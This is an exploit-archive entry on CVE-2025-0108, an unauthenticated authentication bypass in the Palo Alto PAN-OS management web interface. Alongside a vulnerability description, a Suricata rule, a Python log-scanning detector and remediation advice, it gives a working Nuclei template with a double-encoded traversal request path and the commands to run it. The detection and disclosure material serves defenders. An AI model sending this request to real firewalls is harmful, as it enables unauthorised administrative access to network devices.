
Palo Alto PAN-OS Management Interface Authentication Bypass (CVE-2025-0108)

by FOLKS-iwd · 2026-05-16

CVSS: 9.1/10
Severity: Critical
CVE: CVE-2025-0108
Category: web
Affected product: Palo Alto Networks PAN-OS management web interface
Affected versions: PAN-OS versions impacted by CVE-2025-0108 (see vendor advisory for exact fixed builds)
Disclosed: 2026-05-16
Patch status: patched

Metadata

| Field | Value |
|---|---|
| Date Added | 2026-05-16 |
| Author / Researcher | FOLKS-iwd |
| CVE / Advisory | CVE-2025-0108 |
| Category | web |
| Severity | Critical |
| CVSS Score | 9.1 (CVSSv3) |
| Status | Weaponized |
| Tags | auth-bypass, path-traversal, PAN-OS, Palo Alto, management-interface, unauthenticated |
| Related | N/A |

Affected Target

| Field | Value |
|---|---|
| Software / System | Palo Alto Networks PAN-OS management web interface |
| Versions Affected | PAN-OS versions impacted by CVE-2025-0108 (see vendor advisory for exact fixed builds) |
| Language / Platform | PAN-OS web management plane (HTTP/HTTPS interface) |
| Authentication Required | No |
| Network Access Required | Yes |

Summary

CVE-2025-0108 is an authentication bypass in the PAN-OS management interface that can allow unauthorized administrative access. The PoC uses a crafted path-traversal-style request to reach sensitive management functionality without a valid login session. Public reporting indicates active exploitation in early 2025, and defenders frequently track this issue as part of chained PAN-OS compromise activity.


Vulnerability Details

Root Cause

The vulnerable request-handling path does not correctly enforce authentication checks when specific crafted management-interface paths are requested. Path-traversal-style encoding can route traffic into privileged handlers that are expected to be reachable only after successful authentication.

Attack Vector

A remote attacker with network reachability to the PAN-OS management interface sends crafted unauthenticated HTTP requests to vulnerable endpoints. The included PoC template checks for this condition using an encoded traversal path that returns management content when bypass is successful.

Impact

Successful exploitation can provide unauthorized access to management-plane functionality. In real-world attack chains, this can enable follow-on actions such as configuration tampering, credential abuse, and broader device compromise.


Environment / Lab Setup

OS:          Linux/macOS/Windows attacker host
Target:      PAN-OS firewall exposing management interface (authorized lab only)
Attacker:    Security testing workstation
Tools:       Nuclei, curl

Setup Steps

git clone https://github.com/FOLKS-iwd/CVE-2025-0108-PoC
cd CVE-2025-0108-PoC

nuclei -t CVE-2025-0108.yaml -u https://<target-management-host>

Proof of Concept

Step-by-Step Reproduction

  1. Confirm authorized test scope and identify a PAN-OS management interface target.
  2. Execute the Nuclei template against the target using the included CVE-2025-0108.yaml file.
  3. Review matched responses for indicators that an unauthenticated crafted request reached management content.

Exploit Code

See CVE-2025-0108.yaml in this folder.

id: CVE-2025-0108

requests:
  - method: GET
    path:
      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

Expected Output

[INF] Loaded template CVE-2025-0108
[CVE-2025-0108] [http] [high] https://<target-management-host>/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

Screenshots / Evidence

  • screenshots/ — add authorized captures of template execution and response evidence

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

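# Matches the raw (undecoded) URI: the normalized http_uri buffer is percent-decoded, so the literal %252e would not appear there.
alert http any any -> $HOME_NET any (msg:"Possible PAN-OS CVE-2025-0108 authentication bypass probe"; flow:established,to_server; content:"/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"; http_raw_uri; nocase; sid:95250108; rev:1;)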
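
The rule above matches one literal URI string. As an added example (not part of the PoC repository or this archive entry), the following Python log check generalizes the idea: it percent-decodes each request path until it stops changing and flags any request that starts under /unauth/ but resolves outside it. The combined-format access log, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: access logs in common/combined format ("METHOD URI HTTP/x" STATUS).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PREFIX = "/unauth/"  # unauthenticated area named in the page's request path

def fully_decode(path, max_rounds=5):
    """Percent-decode until the path stops changing; return (path, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(uri):
    """Return a reason string if the URI escapes PREFIX after decoding, else None."""
    decoded, rounds = fully_decode(uri.split("?", 1)[0])
    if not decoded.startswith(PREFIX):
        return None
    resolved = posixpath.normpath(decoded)
    if resolved.startswith(PREFIX) or resolved == PREFIX.rstrip("/"):
        return None  # still inside the unauthenticated area
    return f"escapes {PREFIX} after {rounds} decode round(s): {resolved}"

def scan(lines):
    """Return (source_ip, uri, status, reason) for every suspicious log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        reason = classify(m["uri"]) if m else None
        if reason:
            findings.append((line.split(" ", 1)[0], m["uri"], m["status"], reason))
    return findings

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2025:10:00:01 +0000] "GET /unauth/example.css HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Mar/2025:10:00:02 +0000] "GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Mar/2025:10:00:03 +0000] "GET /unauth/%252E%252E/php/ztp_gate.php/PAN_help/x.css HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that a traversal-shaped request was received; correlate it with the response status and any subsequent management-plane activity from the same source before treating it as a successful bypass.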

Remediation

| Action | Detail |
|---|---|
| Patch | Apply Palo Alto Networks security updates that remediate CVE-2025-0108 |
| Workaround | Restrict management interface access to trusted admin networks and VPN-only entry points |
| Config Hardening | Disable direct internet exposure of management interfaces and monitor for traversal-pattern probes |

Notes

Auto-ingested from https://github.com/FOLKS-iwd/CVE-2025-0108-PoC on 2026-05-16.